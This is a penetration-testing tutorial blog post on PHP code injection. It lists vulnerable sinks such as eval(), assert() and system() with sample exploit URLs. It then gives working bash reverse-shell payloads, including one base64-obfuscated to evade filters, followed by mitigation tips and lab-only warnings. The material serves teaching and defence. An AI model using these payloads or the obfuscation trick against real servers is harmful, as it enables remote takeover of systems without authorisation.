Reading Time: 3 minutes

Introduction

PHP, one of the most widely used server-side scripting languages, is often the target of web-based attacks due to its dynamic execution features and flexibility. Among the most critical vulnerabilities affecting PHP applications is PHP Code Injection, which occurs when user input is unsafely evaluated or executed as PHP code. This flaw can lead to full server compromise, particularly when functions like eval(), system(), or assert() are used with unsanitized input.

One notorious technique that leverages this vulnerability is the reverse shell—a method that allows attackers to gain remote access to a target system by making the victim server initiate an outbound connection. This is especially dangerous in environments like security testing labs (e.g., bWAPP, DVWA) or improperly secured production apps.

In this post, we’ll explore how PHP code injection works, examine a typical reverse shell payload, understand common syntax pitfalls (such as quoting and redirection issues), and walk through safe ways to structure payloads for controlled testing environments.

Most Common Vulnerable Parameters or Input Vectors

Here’s a list of common vulnerable parameters or input vectors where arbitrary code might be injected:

🔸 1. eval() Input

eval($_GET['code']);

Exploit:

?code=phpinfo();

# Sample URL:
http://victim-host/index.php?code=phpinfo();

🔸 2. assert() with string argument

assert($_POST['run']);

Exploit:

POST: run=phpinfo();

# Sample URL:
http://victim-host/upload.php?run=phpinfo(); 

🔸 3. preg_replace() with /e modifier

(DEPRECATED since PHP 5.5.0, REMOVED in PHP 7.0.0)

preg_replace('/.*/e', $_GET['code'], '');

Exploit:

?code=system('ls')

# Sample URL:
http://victim-host/index.php?code=system('ls');

🔸 4. create_function()

$func = create_function('', $_GET['payload']); $func();

Exploit:

?payload=phpinfo();

# Sample URL:
http://victim-host/index.php?payload=phpinfo();

🔸 5. system(), exec(), shell_exec(), passthru(), popen()

• If these are passed unsanitized input.

system($_GET['cmd']);

Exploit:

?cmd=ls -la

# Sample URL:
http://victim-host/index.php?cmd=ls -la

🔸 6. $_GET, $_POST, $_COOKIE, $_REQUEST, $_FILES

• All of these superglobals can be vectors for injection if passed to dangerous functions.

🔸 7. Custom Functions Taking User Input

Developers often create helper functions that use eval() or similar.

function runCode($input) {
    eval($input);
} 
runCode($_POST['do']);

Exploit:

?do=phpinfo();

# Sample URL:
http://victim-host/index.php?do=phpinfo();

🔸 8. Dynamic Function Calls

$func = $_GET['f'];
$func('ls');

Exploit:

?f=phpinfo();

# Sample URL:
http://victim-host/index.php?f=phpinfo();

🔸 9. Serialized or Base64-Encoded Input

• Sometimes code is hidden in encoded formats.

$data = unserialize(base64_decode($_POST['input']);

Testing with Reverse Shell Payload

🔧 Option 1: Escape via eval() or system() in PHP

If using eval() or injecting through user input, you can use this payload:

system("bash -c 'bash -i >& /dev/tcp/127.0.0.1/8888 0>&1'");

# Sample URL:
http://victim-host/index.php?code=system("bash -c 'bash -i >& /dev/tcp/127.0.0.1/8888 0>&1'");

Or escape like:

eval("system(\"bash -c 'bash -i >& /dev/tcp/127.0.0.1/8888 0>&1'\");");

🔧 Option 2: Use base64 to obfuscate and avoid escaping

Another method (especially if filters are present):

eval("system(base64_decode('YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODg4OCAwPiYxJw=='));");

This decodes to:

bash -c 'bash -i >& /dev/tcp/127.0.0.1/8888 0>&1;

Note: For this section, the default 127.0.0.1:8888 refers to the listener you’ve set up on your Kali machine. This value will likely vary based on your Kali’s IP address (which could be private or public) and the port you’ve chosen for the listener.

🔒 Warning (for ethical use only)

• This is a reverse shell payload used in security testing or labs like bWAPP, Mutilldae II.
• Only use this in a controlled and legal environment (like your own test VM).
• Unauthorized use is illegal and unethical.

📌 Summary: Dangerous Input Parameters

Type	Vulnerable Parameters (examples)
Code Eval	$_GET['code'], $_POST['run'], etc.
Command Exec	$_GET['cmd'], $_POST['exec']
Dynamic Func	$_GET['f']
Serialized	$_POST['data']

✅ Mitigation Tips

• Never trust user input.
• Use allowlists for function calls or files.
• Avoid eval(), assert(), or deprecated features.
• Use prepared statements for DB access.
• Set appropriate PHP configuration:
  • allow_url_include = Off
  • display_errors = Off
  • disable_functions = eval,exec,shell_exec,system,passthru

Final Thoughts

Understanding how PHP interprets user input is essential for both offensive security testing and defensive coding. A single misused function, like eval() or system(), can open the door to remote code execution, especially when combined with powerful payloads like reverse shells.

Key Takeaways:

• Never trust user input—always validate and sanitize it.
• Avoid dangerous PHP functions (eval(), assert(), system(), etc.) unless absolutely necessary.
• Reverse shells are powerful but dangerous tools—use only in ethical, legal, and controlled environments.
• Quoting and escaping matter—syntax errors can stop an attack, but they can also teach you how to improve your payload construction.
• Base64 encoding and bash -c are useful for bypassing parsing issues or basic filters during security assessments.

If you’re learning penetration testing or working on CTF challenges, mastering PHP injection and reverse shell syntax can significantly boost your understanding of web application vulnerabilities. But remember: with great power comes great responsibility—always practice safe and ethical hacking.